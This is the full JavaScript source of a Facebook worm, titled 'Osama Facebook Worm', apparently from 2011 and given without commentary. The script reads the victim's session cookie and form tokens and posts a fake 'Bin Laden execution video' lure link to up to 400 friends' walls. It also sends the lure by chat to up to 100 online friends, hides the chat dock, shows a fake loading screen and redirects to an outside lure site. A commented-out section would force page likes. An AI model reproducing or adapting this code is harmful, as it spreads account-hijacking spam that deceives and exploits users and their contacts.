Osama Facebook Worm

1. //alert('Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!');
2.  
3. function readCookie(name)
4. {
5.     var nameEQ = name + "=";
6.     var ca = document.cookie.split(';');
7.  
8.     for (var i=0;i < ca.length;i++) {
9.         var c = ca[i];
10.        
11.         while (c.charAt(0)==' ') {
12.             c = c.substring(1,c.length);
13.         }
14.        
15.         if (c.indexOf(nameEQ) == 0) {
16.             return c.substring(nameEQ.length,c.length);
17.         }
18.     }
19.    
20.     return null;
21. }
22.  
23. var user_id = readCookie("c_user");
24.  
25. // Setup some variables
26.  
27. var post_form_id = document.getElementsByName('post_form_id')[0].value;
28. var fb_dtsg   = document.getElementsByName('fb_dtsg')[0].value;
29.  
30. // Chat message variables
31.  
32. var linkies = [
33.     "http://www.facebook.com/Osama.Gets.Shot.Down",
34.     "http://www.facebook.com/Osama.Gets.Shot.Down",
35.     "http://www.facebook.com/Osama.Gets.Shot.Down",
36.     "http://www.facebook.com/Osama.Gets.Shot.Down"
37. ]
38.  
39. var this_chat    = "Watch Osama's EXECUTION Video! " + linkies[Math.floor(Math.random()*linkies.length)];
40. var prepared_chat = encodeURIComponent(this_chat);
41.  
42. //
43. // Post Link to friends walls
44. //
45.  
46. var token = Math.round(new Date().getTime() / 1000);
47.  
48. var http1 = new XMLHttpRequest();
49.  
50. var url1 = "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token="+token+"-6&filter[0]=user&options[0]=friends_only";
51.  
52. var params1 = "";
53.  
54. http1.open("GET", url1+"?"+params1, true);
55. http1.onreadystatechange = function() //Call a function when the state changes.
56. {
57.     if (http1.readyState == 4 && http1.status == 200) { // If state = success
58.         var response1 = http1.responseText;
59.  
60.         response1 = response1.replace("for (;;);", ""); // Get rid of the junk at the beginning of the returned object
61.         response1 = JSON.parse(response1); // Convert the response to JSON
62.  
63.         //alert(response4.toSource());
64.  
65.         var count = 0;
66.  
67.         for (uid in response1.payload.entries) {
68.             if (count < 400) {
69.                 //alert("SENT TO "+response1.payload.entries[count].uid);
70.  
71.                 // Loop to send messages
72.  
73.                 // New XMLHttp object
74.                 var httpwp = new XMLHttpRequest();
75.  
76.                 var urlwp = "http://www.facebook.com/ajax/profile/composer.php?__a=1";
77.  
78.                 var statusmessage="Disturbing Yet Awesome!";
79.                 var title="Bin Laden EXECUTION Video! Yes it's REAL!";
80.                 var link=linkies[Math.floor(Math.random()*linkies.length)];
81.                 var description="Commandos attack Bin Laden's compund and take him out!";
82.                 var picture="http://i.imgur.com/yTjtU.jpg";
83.  
84.                 var paramswp = "post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&xhpc_composerid=u574553_1&xhpc_targetid="+response1.payload.entries[count].uid+"&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][metaTagMap][0][http-equiv]=content-type&attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][metaTagMap][1][property]=og%3Atitle&attachment[params][metaTagMap][1][content]="+title+"&attachment[params][metaTagMap][2][property]=og%3Aurl&attachment[params][metaTagMap][2][content]="+link+"&attachment[params][metaTagMap][3][property]=og%3Asite_name&attachment[params][metaTagMap][3][content]="+title+"&attachment[params][metaTagMap][4][property]=og%3Aimage&attachment[params][metaTagMap][4][content]="+picture+"&attachment[params][metaTagMap][5][property]=og%3Adescription&attachment[params][metaTagMap][5][content]="+description+"&attachment[params][metaTagMap][6][name]=description&attachment[params][metaTagMap][6][content]="+description+"&attachment[params][metaTagMap][7][http-equiv]=Content-Type&attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][medium]=106&attachment[params][urlInfo][user]="+link+"&attachment[params][favicon]=http%3A%2F%2F20-y-rr-z.info%2Ffavicon.ico&attachment[params][title]="+title+"&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]="+description+"&attachment[params][url]="+link+"&attachment[params][ttl]=0&attachment[params][error]=1&attachment[params][responseCode]=206&attachment[params][metaTags][description]="+description+"&attachment[params][images][0]="+picture+"&attachment[params][scrape_time]=1302991496&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text="+statusmessage+")&xhpc_message="+statusmessage+")&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest";
85.  
86.                 httpwp.open("POST", urlwp, true);
87.  
88.                 //Send the proper header information along with the request
89.  
90.                 httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
91.                 httpwp.setRequestHeader("Content-length", paramswp.length);
92.                 httpwp.setRequestHeader("Connection", "keep-alive");
93.  
94.                 httpwp.onreadystatechange = function() //Call a function when the state changes.
95.                 {
96.                     if (httpwp.readyState == 4 && httpwp.status == 200) {
97.                         //alert(http.responseText);
98.                         //alert('buddy list fetched');
99.                     }
100.                 }
101.  
102.                 httpwp.send(paramswp);
103.             }
104.  
105.             count++; // increment counter
106.         }
107.  
108.         http1.close; // Close the connection
109.     }
110. }
111.  
112. http1.send(null);
113.  
114. //
115. // Hide chat boxes
116. //
117.  
118. var hide = document.getElementById('fbDockChatTabSlider');
119.  
120. hide.style.display = "none";
121.  
122. //
123. // Get online friends and send chat message to them
124. //
125.  
126. var http3 = new XMLHttpRequest();
127.  
128. var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1";
129. var params3 = "user="+user_id+"&popped_out=false&force_render=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
130. http3.open("POST", url3, true);
131.  
132. //Send the proper header information along with the request
133. http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
134. http3.setRequestHeader("Content-length", params3.length);
135. http3.setRequestHeader("Connection", "close");
136.  
137. http3.onreadystatechange = function() //Call a function when the state changes.
138. {
139.     if (http3.readyState == 4 && http3.status == 200) {
140.         var response3 = http3.responseText;
141.  
142.         response3 = response3.replace("for (;;);", "");
143.         response3 = JSON.parse(response3);
144.  
145.         var count = 0;
146.  
147.         for (property in response3.payload.buddy_list.nowAvailableList) {
148.             if(count < 100) {
149.                 // Loop to send messages
150.  
151.                 // New XMLHttp object
152.                 var httpc = new XMLHttpRequest();
153.  
154.                 // Generate random message ID
155.  
156.                 var msgid = Math.floor(Math.random()*100);
157.  
158.                 var time = Math.round(new Date().getTime() / 1000);
159.  
160.                 var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1";
161.                 var paramsc = "msg_id="+msgid+"&client_time="+time+"&to="+property+"&num_tabs=1&pvs_time="+time+"&msg_text="+prepared_chat+"&to_offline=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
162.                 httpc.open("POST", urlc, true);
163.  
164.                 //Send the proper header information along with the request
165.                 httpc.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
166.                 httpc.setRequestHeader("Content-length", paramsc.length);
167.                 httpc.setRequestHeader("Connection", "close");
168.  
169.                 httpc.onreadystatechange = function() //Call a function when the state changes.
170.                 {
171.                     if(httpc.readyState == 4 && httpc.status == 200) {
172.                         //alert(http.responseText);
173.                         //alert('buddy list fetched');
174.                     }
175.                 }
176.                
177.                 httpc.send(paramsc);
178.             }
179.  
180.             //alert(property);
181.             count++; // increment counter
182.         }
183.  
184.         http3.close; // Close the connection
185.     }
186. }
187.  
188. http3.send(params3);
189.  
190. /*
191. //
192. // Become a Fan - MW GIVEAWAY
193. //
194.  
195. var http4 = new XMLHttpRequest();
196.  
197. var url4 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
198.  
199. var params4 = "fbpage_id=217981564879947&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"
200.  
201. http4.open("POST", url4, true);
202.  
203. //Send the proper header information along with the request
204. http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
205. http4.setRequestHeader("Content-length", params4.length);
206. http4.setRequestHeader("Connection", "close");
207.  
208. http4.onreadystatechange = function() //Call a function when the state changes.
209. {
210.     if (http4.readyState == 4 && http4.status == 200) {
211.         http4.close; // Close the connection
212.     }
213. }
214.  
215. http4.send(params4);
216.  
217. //
218. // Become a Fan - MW GIft
219. //
220.  
221. var http5 = new XMLHttpRequest();
222.  
223. var url5 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
224.  
225. var params5 = "fbpage_id=217981564879947&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"
226.  
227. http5.open("POST", url5, true);
228.  
229. //Send the proper header information along with the request
230. http5.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
231. http5.setRequestHeader("Content-length", params5.length);
232. http5.setRequestHeader("Connection", "close");
233.  
234. http5.onreadystatechange = function() //Call a function when the state changes.
235. {
236.     if (http5.readyState == 4 && http5.status == 200) {
237.         http5.close; // Close the connection
238.     }
239. }
240.  
241. http5.send(params5);
242. */
243.  
244. //document.getElementById('susta').style.display="none";
245. document.getElementById('contentArea').innerHTML="<center><br><br><br><br><br><br><br><br><img src=\"http://www.hindustantimes.com/images/loading_gif.gif\" /><br />Please wait...</center>";
246. setTimeout("window.location = 'http://osama.mytopanswers.info/video.htm';", 15000);